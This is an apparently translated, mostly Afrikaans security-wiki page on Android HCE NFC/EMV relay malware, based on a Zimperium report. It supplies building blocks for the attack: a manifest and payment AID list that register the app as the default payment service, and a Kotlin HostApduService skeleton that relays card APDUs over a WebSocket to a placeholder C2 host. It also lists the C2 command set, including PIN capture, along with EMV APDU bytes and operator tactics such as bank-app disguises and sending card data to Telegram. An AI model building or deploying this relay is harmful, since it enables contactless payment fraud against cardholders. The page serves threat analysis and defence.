Android HCE NFC/EMV Relay Attacks

Reading time: 6 minutes

Oorsig

Misbruik van Android Host Card Emulation (HCE) maak dit moontlik vir 'n kwaadwillige app wat as die standaard NFC-betaaldiens ingestel is om EMV-kontaklose transaksies in real-time te herlei. Die POS-terminal kommunikeer via ISO 14443-4/EMV met die foon; die app se HostApduService ontvang APDUs en stuur hulle oor 'n bidirectionele C2 (dikwels WebSocket) na 'n backend wat antwoorde saamstel, wat dan terug na die POS herlei word. Dit maak live kaartemulasie moontlik sonder plaaslike kaartdata. Kampanjes wat op skaal waargeneem is, hermerk hulself as bank-/regeringsapps, vra die gebruiker om die standaard betaling-app te word, en eksfiltreer toestel-/kaartdata outomaties na Telegram-bots/-kanale.

Key traits

• Android-komponente: HostApduService + standaard NFC-betaalhandlêr (kategorie "payment")
• Transport/C2: WebSocket vir APDU-relay; Telegram bot API vir exfil/ops
• Operator-werkvloei: gestruktureerde opdragte (login, register_device, apdu_command/apdu_response, get_pin/pin_response, paired, check_status, update_required, telegram_notification, error)
• Rolle: scanner (lees EMV-data) vs tapper (HCE/relay) builds

Minimale implementasie boublokke

Manifest (word die standaard betaling HCE-diens)

<uses-feature android:name="android.hardware.nfc.hce" android:required="true"/>
<uses-permission android:name="android.permission.NFC"/>

<application ...>
<service
android:name=".EmvRelayService"
android:exported="true"
android:permission="android.permission.BIND_NFC_SERVICE">
<intent-filter>
<action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
</intent-filter>
<meta-data
android:name="android.nfc.cardemulation.host_apdu_service"
android:resource="@xml/aid_list"/>
</service>
</application>

Voorbeeld AID-lys met EMV betalingkategorie (slegs apps wat as die standaard-betaaltoepassing ingestel is, kan op hierdie AIDs antwoord):

<?xml version="1.0" encoding="utf-8"?>
<host-apdu-service xmlns:android="http://schemas.android.com/apk/res/android"
android:description="@string/app_name"
android:requireDeviceUnlock="false">
<aid-group android:category="payment" android:description="@string/app_name">
<!-- PPSE (2PAY.SYS.DDF01) routing -->
<aid-filter android:name="325041592E5359532E4444463031"/>
<!-- Common EMV AIDs (examples): -->
<aid-filter android:name="A0000000031010"/> <!-- VISA credit/debit -->
<aid-filter android:name="A0000000041010"/> <!-- MasterCard -->
<aid-filter android:name="A00000002501"/>   <!-- AmEx -->
</aid-group>
</host-apdu-service>

Vra die gebruiker om die standaard-betaal-app in te stel (open die OS-instellings):

val intent = Intent("android.settings.NFC_PAYMENT_SETTINGS")
startActivity(intent)

HostApduService relay skelet

class EmvRelayService : HostApduService() {
private var ws: okhttp3.WebSocket? = null

override fun onCreate() {
super.onCreate()
// Establish C2 WebSocket early; authenticate and register device
val client = okhttp3.OkHttpClient()
val req = okhttp3.Request.Builder().url("wss://c2.example/ws").build()
ws = client.newWebSocket(req, object : okhttp3.WebSocketListener() {})
}

override fun processCommandApdu(commandApdu: ByteArray?, extras: Bundle?): ByteArray {
// Marshal APDU to C2 and block until response
val id = System.nanoTime()
val msg = mapOf(
"type" to "apdu_command",
"id" to id,
"data" to commandApdu!!.toHex()
)
val response = sendAndAwait(msg) // wait for matching apdu_response{id}
return response.hexToBytes()
}

override fun onDeactivated(reason: Int) {
ws?.send("{\"type\":\"card_removed\"}")
}

private fun sendAndAwait(m: Any): String {
// Implement correlation + timeout; handle error/blocked status
// ...
return "9000" // fall back to SW success if needed
}
}

Nuttige nota: Agtergronddiens moet binne die POS timeout-begroting (~'n paar honderd ms) per APDU reageer; handhaaf 'n lae-latensie socket en pre-auth met die C2. Bestaan voort oor prosesdood deur gebruik te maak van 'n foreground service soos nodig.

Tipiese C2-opdragstel (waargeneem)

login / login_response
register / register_device / register_response
logout
apdu_command / apdu_response
card_info / clear_card_info / card_removed
get_pin / pin_response
check_status / status_response
paired / unpaired
update_required
telegram_notification / telegram_response
error

EMV kontakloos uitruil (inleiding)

Die POS dryf die vloei; die HCE-app stuur eenvoudig APDUs deur:

• SELECT PPSE (2PAY.SYS.DDF01)
• 00 A4 04 00 0E 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 00
• SELECT application AID (e.g., VISA A0000000031010)
• 00 A4 04 00 len 00
• GET PROCESSING OPTIONS (GPO)
• 80 A8 00 00 Lc 00
• READ RECORD(S) per AFL
• 00 B2 <SFI/record> 0C 00
• GENERATE AC (ARQC/TC)
• 80 AE 80 00 Lc 00

In 'n relay vervaardig die backend geldige FCI/FCP, AFL, rekords en 'n cryptogram; die telefoon stuur net bytes deur.

Operator-werkvloei in die veld waargeneem

• Deception + install: app herontwerp as bank-/regeringsportaal, wys 'n volskerm WebView en versoek onmiddellik om die standaard NFC-betalingsapp te word.
• Event-triggered activation: NFC tap wakes HostApduService; die relay begin.
• Scanner/Tapper roles: one build reads EMV data from a victim card (PAN, exp, tracks, device/EMV fields) and exfiltrates; another build (or the same device later) performs HCE relay to a POS.
• Exfiltration: device/card data is auto-posted to private Telegram channels/bots; WebSocket coordinates sessions and UI prompts (e.g., on-device PIN UI).

References

• Zimperium – Tap-and-Steal: The Rise of NFC Relay Malware on Mobile Devices
• Android HostApduService
• Android HCE and Card Emulation docs
• Zimperium IOCs – 2025-10-NFCStealer